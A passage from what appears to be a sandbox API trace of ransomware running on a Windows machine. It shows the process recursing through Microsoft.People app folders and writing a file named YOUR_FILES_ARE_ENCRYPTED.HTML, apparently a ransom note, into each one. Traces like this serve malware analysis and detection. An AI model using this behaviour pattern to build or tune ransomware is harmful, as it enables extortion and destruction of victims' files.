ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="Temp", cAlternateFileName="")) returned 1 [0117.278] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.278] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\Temp") returned 87 [0117.278] GetProcessHeap () returned 0x600000 [0117.278] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.278] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\Temp" [0117.278] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\Temp\\*" [0117.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0117.279] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0117.279] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eb50, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0117.279] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0117.279] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0117.279] GetProcessHeap () returned 0x600000 [0117.279] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0117.279] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0117.280] CloseHandle (hObject=0x214) returned 1 [0117.280] GetProcessHeap () returned 0x600000 [0117.280] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.280] GetProcessHeap () returned 0x600000 [0117.280] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.280] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dd1f677, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dd1f677, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dd1f677, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="Temp", cAlternateFileName="")) returned 0 [0117.280] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0117.280] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0117.280] GetProcessHeap () returned 0x600000 [0117.280] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.281] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.282] CloseHandle (hObject=0x320) returned 1 [0117.282] GetProcessHeap () returned 0x600000 [0117.282] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.282] GetProcessHeap () returned 0x600000 [0117.282] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.283] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dc86f85, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dc86f85, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dc86f85, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0117.283] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.283] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AppData") returned 87 [0117.283] GetProcessHeap () returned 0x600000 [0117.283] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.284] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AppData" [0117.284] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AppData\\*" [0117.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dc86f85, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dc86f85, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dc86f85, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626638 [0117.284] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dc86f85, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dc86f85, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dc86f85, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.284] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dc86f85, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dc86f85, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dc86f85, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0117.284] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0117.284] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0117.284] GetProcessHeap () returned 0x600000 [0117.284] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.285] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.286] CloseHandle (hObject=0x320) returned 1 [0117.286] GetProcessHeap () returned 0x600000 [0117.286] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.286] GetProcessHeap () returned 0x600000 [0117.286] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.287] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dba2246, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dba2246, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dba2246, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0117.287] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.287] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalCache") returned 90 [0117.287] GetProcessHeap () returned 0x600000 [0117.287] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.288] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalCache" [0117.288] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalCache\\*" [0117.288] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dba2246, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dba2246, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dba2246, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626838 [0117.289] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dba2246, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dba2246, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dba2246, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.289] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dba2246, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dba2246, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dba2246, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0117.289] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0117.289] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0117.289] GetProcessHeap () returned 0x600000 [0117.289] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.290] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.291] CloseHandle (hObject=0x320) returned 1 [0117.291] GetProcessHeap () returned 0x600000 [0117.291] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.291] GetProcessHeap () returned 0x600000 [0117.291] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.291] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dabd1ad, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dabd1ad, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dabd1ad, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0117.291] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.291] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalState") returned 90 [0117.291] GetProcessHeap () returned 0x600000 [0117.291] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.291] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalState" [0117.291] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalState\\*" [0117.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dabd1ad, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dabd1ad, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dabd1ad, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626638 [0117.291] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dabd1ad, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dabd1ad, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dabd1ad, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.291] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dabd1ad, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dabd1ad, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dabd1ad, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0117.291] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0117.291] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0117.291] GetProcessHeap () returned 0x600000 [0117.291] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.292] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.293] CloseHandle (hObject=0x320) returned 1 [0117.293] GetProcessHeap () returned 0x600000 [0117.293] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.293] GetProcessHeap () returned 0x600000 [0117.293] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.294] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e2c90b6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e2c90b6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e2c90b6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0117.294] StrStrIW (lpFirst="Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.294] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe") returned 127 [0117.294] GetProcessHeap () returned 0x600000 [0117.294] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.295] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe" [0117.295] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\*" [0117.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e2c90b6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e2c90b6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e2c90b6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, 